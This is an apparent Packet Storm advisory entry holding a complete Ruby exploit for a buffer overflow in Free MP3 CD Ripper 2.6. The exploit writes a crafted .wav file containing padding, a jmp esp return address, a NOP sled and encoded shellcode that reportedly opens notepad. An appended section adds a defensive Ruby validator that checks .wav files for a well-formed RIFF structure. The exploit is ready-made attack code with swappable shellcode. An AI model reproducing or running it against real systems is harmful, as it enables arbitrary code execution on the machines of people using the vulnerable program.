Free MP3 CD Ripper 2.6 Buffer Overflow

2010-04-03T00:00:00
ID PACKETSTORM:88016
Type packetstorm
Reporter Richard Leahy
Modified 2010-04-03T00:00:00

Description

`# Exploit Title: Free MP3 CD Ripper 2.6 0 day  
# Date: 30/03/2010  
# Author: Richard Leahy  
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html  
# Version: 2.6  
# Tested on: Windows Xp Sp2  
  
# To exploit this, open up the application and select file -> wav converter -> wav to mp3.  
  
# Use your favourite programming language to print out the contents into a text file. Save the text file as a .wav,  
# then open up the .wav file and boom.  
  
# Feel free to email me: leahy_rich@hotmail.com  
  
#code  
nop = "\x90"  
  
#imagehlp  
jmp_esp = [0x76cafa32].pack('V')  
  
#shellcode opens notepad  
shellcode =  
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +  
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +  
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +  
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +  
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +  
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +  
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +  
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +  
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +  
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +  
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +  
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +  
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +  
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +  
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +  
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +  
"\x2a\x67\xec"  
  
boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode  
puts boom  
`
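
The file described above is plain text saved with a .wav extension, so it carries no RIFF/WAVE container structure at all. The following is an added example, not part of the original advisory: a structural pre-check a defender could run on .wav input before it reaches a converter. The names `wav_problems` and `sample_wav` and all sample bytes are constructed for illustration.

```ruby
# Added example: structural triage of .wav input (constructed, not from the advisory).

# Returns the reasons the data is not a well-formed RIFF/WAVE container.
# An empty list means the basic structure checks out.
def wav_problems(data)
  data = data.dup.force_encoding(Encoding::BINARY)
  return ["shorter than the 12-byte RIFF header"] if data.bytesize < 12

  problems = []
  magic, riff_size, form = data.unpack("a4Va4")
  problems << "missing RIFF magic" unless magic == "RIFF"
  problems << "form type is not WAVE" unless form == "WAVE"
  return problems unless problems.empty?

  problems << "RIFF size field exceeds file length" if riff_size + 8 > data.bytesize

  # Walk the chunk list: 4-byte id, 32-bit little-endian length, payload.
  offset = 12
  seen_fmt = false
  while offset + 8 <= data.bytesize
    id, len = data.byteslice(offset, 8).unpack("a4V")
    if offset + 8 + len > data.bytesize
      problems << "chunk #{id.inspect} overruns the file"
      break
    end
    seen_fmt ||= (id == "fmt " && len >= 16)
    offset += 8 + len + (len & 1) # chunks are padded to an even length
  end
  problems << "no valid fmt chunk" unless seen_fmt
  problems
end

# Constructed sample: minimal 8-bit mono PCM WAV with four data bytes.
def sample_wav
  fmt  = "fmt " + [16, 1, 1, 8000, 8000, 1, 8].pack("VvvVVvv")
  body = "data" + [4].pack("V") + ("\x00" * 4)
  "RIFF" + [4 + fmt.bytesize + body.bytesize].pack("V") + "WAVE" + fmt + body
end

if __FILE__ == $PROGRAM_NAME
  # Constructed stand-in for a header-less text file renamed to .wav.
  { "sample_wav" => sample_wav, "padding only" => "A" * 4112 }.each do |name, bytes|
    issues = wav_problems(bytes)
    puts "#{name}: #{issues.empty? ? 'ok' : issues.join('; ')}"
  end
end
```
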